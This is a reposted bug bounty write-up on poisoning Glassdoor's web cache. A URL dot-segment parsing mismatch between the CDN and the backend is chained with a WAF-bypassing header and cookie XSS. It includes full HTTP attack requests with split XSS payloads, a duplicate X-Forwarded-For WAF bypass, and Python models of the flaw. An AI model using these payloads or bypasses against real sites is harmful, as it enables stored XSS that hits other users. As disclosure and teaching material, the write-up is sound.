Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique)

Here is how I was able to poison the cache of thousands of pages in Glassdoor with reflected & stored XSS

Introduction

Imagine you just picked up an attractive new bug bounty program that a friend recommended. You’re excited to try it because of all the good stories you’ve heard, but after a few days of intensive recon and research you are left empty-handed, with no findings. The next day you start to doubt yourself, so you start looking for P4s and P5s, when all of a sudden you find a header XSS. It seems pretty lame, until you remember that your target has a caching server! You try to find a way to cache the XSS to store it, but you keep getting stuck on MISS. It looks like they have web cache poisoning protection on this endpoint, making it un-cacheable, so you’re out of luck. Just when you thought you had a P2 or P1, reality HITS you like James Kettle’s web cache poisoning payloads. This seems like a dead end, so what do you do now? Have you tried URL parsing confusions?


  1. For any page under the /Job/ path, all URL parameters are reflected inside a JavaScript script tag. Because the input is not sanitized, we can inject </script into the page through the URL parameters. However, due to the WAF, we cannot simply close the script tag and execute our own JavaScript.
  2. The optimizelyEndUserId cookie value is reflected in the page, right after the URL parameters. By combining this with the issue from step 1, we can bypass the WAF by splitting the payload into two parts and execute arbitrary JavaScript. However, this is a self XSS, because we cannot force our victim to send custom cookies.
  3. We can get past this via cache poisoning. Sadly, the pages under /Job/ were not being cached, but all the pages under /Award/ were.
  4. After some testing, I found that path traversal sequences such as /../ (also known as dot segments) were being normalized by the caching frontend server but not by the backend web application (a disagreement over RFC 3986, section 5.2.4). This means that a path such as /Job/../Award/<page> is seen as /Award/<page> by the caching server and cached, while the web server returns the contents of a /Job/ page because it does not normalize the path.
  5. As a result, by sending a request to /Job/../Award/<page> with </script in the URL parameters (and the rest of the payload in the cookie), we can succeed in obtaining our XSS. The web server interprets it as a page under /Job/ and returns the contents with our injected XSS payload, while the caching server interprets it as a page under /Award/, causing the response to be cached.
  6. When a victim then visits the cached /Award/<page> URL, our XSS fires.
  7. Achieving a stored XSS was also possible using /mz-survey/interview/collectQuestions_input.htm, which behaved very similarly to /Job, but there the XSS was entirely in the headers and cookies, so sending a parameter in the URL was not necessary.
  8. Sending a request to /mz-survey/interview/collectQuestions_input.htm/../../../Award/<page> with the XSS in the headers and cookies results in a stored XSS under /Award/<page>.

My XSS methodology

  • When testing for XSS, it’s important to consider every type of exploitation and take note of everything that looks interesting.
  • Even if something might not be exploitable now, try to see the potential it will have in a chained exploit.
  • Many times, exploit chains are made up of links that are useless by themselves, but that can be fatal when chained together.
  • In Glassdoor, I found such an endpoint at /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm
  • I found that the parameter name (and the value too) was reflected in the response unsanitized
  • I was very surprised to see this, as it should have been caught very early on. The Glassdoor program has almost 800 submissions, so I didn’t make the mistake of thinking I was the only one who noticed it
  • The parameter was reflected in a string inside a script tag, so to achieve an XSS, I had 2 options:

    1. Escape the string and inject JavaScript
    2. Close the script tag and inject a generic XSS payload
  • For the first option, the string appeared to be escaped with backslashes, and unfortunately bypassing this is hard.
  • My second option, however, had much more potential, as the rest of the user input was not sanitized, so injecting a closing script tag should do the trick
  • However, the moment I put ?</script> (URL decoded here for readability) in the URL, my request was immediately swatted down and blocked by the WAF. This was very much expected, but I eat WAFs for breakfast >:)
  • Before trying to play against the WAF, we have to understand the rules of the game.
  • A common mistake I see people make when trying to bypass WAFs, or just filters in general for that matter, is that they copy and paste generic WAF bypass payloads without actually understanding why the WAF is blocking their requests. Spraying and praying against WAFs is usually a waste of time in my experience, so it’s best to test them manually and, most importantly, understand them
  • So my first step when bypassing a WAF is to start with a blocked payload and remove it character by character until the WAF lets me pass
  • Luckily, it didn’t take long to reach an agreement with the WAF. All I had to do was remove the greater-than sign (>) and I got a 200.
  • So now the question is: what else doesn’t it like? It seemed like any character after </script would get the attention of the WAF, like </scriptaaa for example
  • This would have been a big issue if the WAF truly blocked </script*, but luckily the WAF did allow whitespace characters such as %20 (space), which means that the script tag will eventually be closed by the next greater-than sign (>) in the page
  • So now, the next step is finding a new unsanitized injection point that will allow us to close the script and inject an HTML XSS payload
  • I tried to break the payload into pieces spread across other parameters, but that was blocked too. It seemed like the WAF rule applied to the entire URL, not to individual parameters. Luckily, I have bypassed these types of WAFs before
  • My first go-to technique was an alphanumeric-based HTTP parameter pollution, which I had already used to bypass a similar WAF in this very program.
  • An alphanumeric parameter pollution abuses the alphanumeric ordering of the reflected query parameters, so it is possible to bypass a WAF like this by breaking your payload down backwards into different parameters
  • Unfortunately, that did not work here, but I will release a writeup on how I was able to use this technique to achieve reflected XSS
  • At this point I was losing a bit of hope in this endpoint, so I decided to look for a vulnerability that could serve as a link in a chain instead of a stand-alone vulnerability. That is when I started to take a look at the cookies
  • I noticed that next to the injection point, there was actually a value that came from the optimizelyEndUserId cookie in my request.
  • All I needed to do was close the script tag and inject the HTML. Injecting ><svg> into the cookie seemed to do the trick.
  • Now I needed to actually execute JavaScript. We were already past the hard part, since we could smuggle an svg tag past the WAF, so the rest should be easy
  • A pretty generic WAF bypass payload seemed to do the trick: ><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
  • And now we got an XSS that looks like this:
GET /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm?attack=VULN%3C/script%20 HTTP/2
Cookie: optimizelyEndUserId=BRUH><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 0
  • However it is a self XSS that only exists if we have control over the cookies
  • However, this could be escalated to reflected XSS with cache poisoning, so that’s what I started to look for next (I know I said stored XSS in the description, I promise we will get there soon!)
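
The WAF probing and the split payload described above can be sketched as a small toy model in Python. Everything in it is an assumption made for illustration: TOY_RULE is only a guess at a rule that reproduces the observations in this section (it is not Glassdoor's real WAF rule), render() is a hypothetical template that merely mimics the reflection order (URL parameter first, cookie right after), and the cookie payload is simplified.

```python
import re

# ASSUMPTION: a toy rule that merely reproduces the observations above.
# It blocks "</script" as soon as any non-whitespace character follows it.
TOY_RULE = re.compile(r"</script\s*\S", re.IGNORECASE)


def waf_blocks(value: str) -> bool:
    """Return True if the toy WAF would reject this one input (URL or cookie)."""
    return TOY_RULE.search(value) is not None


def trim_until_allowed(payload: str) -> str:
    """Drop characters from the end, one at a time, until the WAF lets it pass."""
    while payload and waf_blocks(payload):
        payload = payload[:-1]
    return payload


def render(param: str, cookie: str) -> str:
    """HYPOTHETICAL template: the parameter is reflected in a script string
    and the cookie value is reflected right after it."""
    return f'<script>var q="{param}"; var id="{cookie}";</script>'


url_part = "VULN</script "  # the trailing %20, shown decoded
cookie_part = "BRUH><svg/onload=alert(document.domain)>"  # simplified payload
page = render(url_part, cookie_part)

print(trim_until_allowed("</script>"))  # what survives the trimming
print(waf_blocks(url_part), waf_blocks(cookie_part))  # each half on its own
print(waf_blocks(url_part + cookie_part))  # the same payload in one place
print(page)
```

Each half passes the toy rule on its own, while the same payload in a single input is blocked. In a browser, the </script followed by a space starts an end tag, everything up to the next > is swallowed as junk attributes, and the svg tag that follows is parsed as HTML.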

The caching methodology for finding relaxed rules

  • When doing my initial recon, I always like testing the cache to see how it behaves.
  • If I see a path that gets cached, I always try to test its limits. Many websites have unique rules for how they cache specific paths and files, so manually testing for these rules is a great way to get familiar with the cache server
  • When I first go about manually testing for these caching rules, I usually try to mess with the extensions first. I will remove, add, or change the extension and always carefully observe the caching headers and content of the response
  • After I mess around with the extension, I will test the path itself
  • For example, in Glassdoor I noticed that a page under /Award/ ending in ,11_IC1132348_KO12,42069.htm was getting cached
  • I intercepted the request and sent it to the Burp repeater for further inspection
  • When I changed the extension, I noticed that although I got a 404 page, I still got MISS/HIT cache headers.
  • This immediately got me thinking that there is some sort of pattern for cache or no cache, instead of hardcoded files that get cached
  • Then I moved on to the path. I tried a nonexistent page under /Award/ and noticed it gave me the same 404 page with the same cache headers.
  • By then I was pretty confident I had figured out what the rule was, but I tested a path outside /Award/ just in case, which gave me a 404 that was not cached
  • So now it was safe to assume that the rule was /Award/*, meaning everything under the /Award path was getting cached
  • For a while, I desperately tried to find some sort of header XSS to get web cache poisoning, but unfortunately I ended up empty-handed. However, this finding was still pretty great for me. While it is not a vulnerability by itself, it was a very relaxed rule and had a lot of potential to be chained with a vulnerability
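
The probing routine above can be sketched as a toy model. ToyCache is a hypothetical stand-in for the CDN, the "NONE" status for responses that are never cached is made up for this sketch, and the paths are invented examples; only the /Award/* rule comes from the text.

```python
from fnmatch import fnmatchcase


class ToyCache:
    """HYPOTHETICAL CDN model: caches every path matching `rule`,
    whatever the backend status code (including 404 pages)."""

    def __init__(self, rule: str) -> None:
        self.rule = rule
        self.stored = set()

    def fetch(self, path: str) -> str:
        """Return the cache status a client would observe for this request."""
        if not fnmatchcase(path, self.rule):
            return "NONE"  # passed through, never cached
        if path in self.stored:
            return "HIT"
        self.stored.add(path)
        return "MISS"


def is_cacheable(cache: ToyCache, path: str) -> bool:
    """Request the same path twice: MISS followed by HIT means it was stored."""
    return [cache.fetch(path), cache.fetch(path)] == ["MISS", "HIT"]


cdn = ToyCache("/Award/*")
for probe in ("/Award/page.htm", "/Award/page.xyz",
              "/Award/does/not/exist", "/Other/does-not-exist"):
    print(probe, is_cacheable(cdn, probe))
```

Against a real target the same loop would send each probe twice with a fresh cache buster and compare the cache headers of the two responses.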

Chaining the exploit

  • Web cache poisoning can be used for many things. The first ones that come to mind are 1) stored XSS, 2) escalation of an unexploitable XSS to reflected XSS, and 3) DoS
  • At the time of my cache rule finding, I was already aware of the unexploitable XSS in /Job/new-york-ny-compliance-officer-jobs-SRCH_IL.0,11_IC1132348_KO12,42069.htm?VULN%3C/script%20, so trying to chain the two bugs into a reflected XSS vulnerability felt like the natural thing to do
  • I went back to the Job path to do a bit more research. I wanted to see if there were any other endpoints that were vulnerable to the self XSS, and there were.
  • I found that every page under the Job path was vulnerable to self XSS, which was great! I took it a step further and noticed that even pages that were supposed to be 404s actually returned 200 and were also vulnerable to the self XSS.
  • So to recap the important information:

    1. The CDN has a rule that will cache /Award/*
    2. There is a self XSS vulnerability on /Job/*
  • The attack surface of these two bugs was not “static”, but relied on a very relaxed wildcard pattern, which got me thinking: “Will these patterns really accept anything? Will the server prioritize the pattern over special URL syntax, such as a dot segment /../, or will it normalize the URL and then match the pattern?”
  • Or in other words: “Will both the backend server’s and the frontend server’s URL parsers normalize the dot segments?”
  • To test this, I tried these two payloads, named on the assumption that the URL parser normalizes the dot segments:

    1. /Award/../this_should_not_cache
    2. /Job/../this_should_give_a_404
  • And to my surprise, they yielded conflicting results
  • The Award payload was NOT cached, meaning the frontend server’s URL parser does normalize the dot segment before matching against the cache rule
  • The Job payload, however, returned a 200, which means that the web server did NOT normalize the dot segment.
  • So to conclude this short test, we can say that the frontend server and the backend server disagree over how a dot segment should be parsed
  • Knowing this, we can construct the following payload:
GET /Job/../Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20 HTTP/2
Cookie: optimizelyEndUserId=BRUH><svg/onload=a=self['aler'%2B't']%3Ba(document.domain)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 0
  • Since the web server will NOT normalize the dot segment, we will get the response with the XSS
  • But because the frontend WILL normalize the dot segment, the response will be cached (and stored) under /Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20
  • So now, when the victim visits /Award/RANDOMPATHTATDOESNOTEXIST?cachebuster=046&attack=VULN%3C/script%20, they will get the stored response with the XSS from the CDN
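
The parser disagreement above can be sketched in Python. remove_dot_segments follows the algorithm in RFC 3986, section 5.2.4; cache_key and backend_route are hypothetical models of the two servers, assuming the frontend normalizes before applying the /Award/* rule and the backend routes on the raw path prefix. The query string is left out to keep the sketch short.

```python
from typing import Optional


def remove_dot_segments(path: str) -> str:
    """Remove "." and ".." segments as described in RFC 3986, section 5.2.4."""
    output = []
    while path:
        if path.startswith("../"):
            path = path[3:]
        elif path.startswith("./"):
            path = path[2:]
        elif path.startswith("/./"):
            path = path[2:]
        elif path == "/.":
            path = "/"
        elif path.startswith("/../"):
            path = path[3:]
            if output:
                output.pop()
        elif path == "/..":
            path = "/"
            if output:
                output.pop()
        elif path in (".", ".."):
            path = ""
        else:
            # Move the first segment (with its leading "/", if any) to the output.
            start = 1 if path.startswith("/") else 0
            end = path.find("/", start)
            if end == -1:
                end = len(path)
            output.append(path[:end])
            path = path[end:]
    return "".join(output)


def cache_key(request_path: str) -> Optional[str]:
    """ASSUMED frontend: normalize first, then apply the /Award/* rule."""
    normalized = remove_dot_segments(request_path)
    return normalized if normalized.startswith("/Award/") else None


def backend_route(request_path: str) -> str:
    """ASSUMED backend: routes on the raw path prefix, no normalization."""
    return "job_page" if request_path.startswith("/Job/") else "other"


attack = "/Job/../Award/RANDOMPATHTATDOESNOTEXIST"
print(cache_key(attack))      # key the frontend stores the response under
print(backend_route(attack))  # page the backend actually renders
print(cache_key("/Award/../this_should_not_cache"))
```

The same request is keyed under /Award/ by the frontend while the backend still serves it as a Job page, which is exactly the gap the payload relies on.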

Stored XSS

  • Once I had a working PoC of my reflected XSS, I immediately reported it.
  • However, I was still not satisfied, because I knew that a stored XSS should be possible under the right conditions
  • So I kept looking for an XSS that was truly all header based and behaved similarly to /Job/*, where an XSS was possible on every page under it.
  • That’s when I remembered my first report to Glassdoor, a reflected XSS via an alphanumeric-ordered parameter pollution (at the time it was still in triage, so it wasn’t fixed).
  • I thought that maybe I would be able to find a header XSS there too, so I kept on looking
  • Luckily for me, the endpoint from that report was also vulnerable to a full header XSS! But it did not behave like /Job/*, where every page under it was vulnerable, so it was pretty much useless
  • I did remember that it was not the only vulnerable endpoint; there were quite a few others
  • Luckily, after testing each of the vulnerable endpoints I had previously reported, I eventually found one that was both vulnerable to header XSS AND behaved like /Job/*: /mz-survey/interview/collectQuestions_input.htm
  • The payload looked something like this
GET /mz-survey/interview/collectQuestions_input.htm/../../../Award/RANDOMPATHTATDOESNOTEXIST123?cachebuster=050 HTTP/2
X-Forwarded-For: VULN
X-Forwarded-For: VULN><svg/onload=self[`alert`](document.domain)>
Cookie: gdId=VULN%22</script%20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  • The reason for splitting the XSS payload into 2 headers and a cookie is to bypass the WAF, as I was not able to put the entire payload into one cookie or header
  • The X-Forwarded-For header is reflected after the cookie, so my opportunity to continue my payload lay there.
  • Unfortunately, the WAF was even stricter for the X-Forwarded-For header, as I was not able to use ANY special characters whatsoever
  • Interestingly enough, there was another cool header confusion: the WAF only inspected the first X-Forwarded-For header, but the web server interpreted and reflected both. This allowed me to easily bypass the WAF by putting a valid value in the first X-Forwarded-For header and the rest of my XSS payload in the second one. This can be seen in the payload above
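
The duplicate-header confusion can be sketched the same way. Both functions below are hypothetical models: the toy WAF is assumed to validate only the first X-Forwarded-For header it sees, and the backend is assumed to join every occurrence with ", " before reflecting it (how the real server combined the two values is not stated in this writeup). The payload is simplified.

```python
import re
from typing import List, Tuple

Headers = List[Tuple[str, str]]

# ASSUMPTION: "no special characters" modeled as letters, digits, dots and colons.
SAFE_VALUE = re.compile(r"[A-Za-z0-9.:]*")


def waf_allows(headers: Headers) -> bool:
    """Toy WAF: validates the FIRST X-Forwarded-For header and stops there."""
    for name, value in headers:
        if name.lower() == "x-forwarded-for":
            return SAFE_VALUE.fullmatch(value) is not None
    return True


def backend_reflection(headers: Headers) -> str:
    """Toy backend: combines every X-Forwarded-For value before reflecting it."""
    values = [value for name, value in headers if name.lower() == "x-forwarded-for"]
    return ", ".join(values)


request_headers = [
    ("X-Forwarded-For", "VULN"),                           # harmless decoy
    ("X-Forwarded-For", "VULN><svg/onload=alert(1)>"),     # simplified payload
]

print(waf_allows(request_headers))          # the decoy is all the WAF looks at
print(backend_reflection(request_headers))  # the payload still reaches the page
```

Swapping the order of the two headers makes the toy WAF reject the request, which shows that the bypass depends only on which occurrence each component reads.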

  • Due to the tricky nature of the bug, the triage process was a little more complicated than usual. Big thanks to @bxmbn (AKA bombon on h1) for giving me some help in the triage process

Originally published by Harel Security Research: Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique)

Copyright notice: posted by admin on April 2, 2024 at 3:33 PM.
When reposting, please credit: Caching the Un-cacheables – Abusing URL Parser Confusions (Web Cache Poisoning Technique) | CTF导航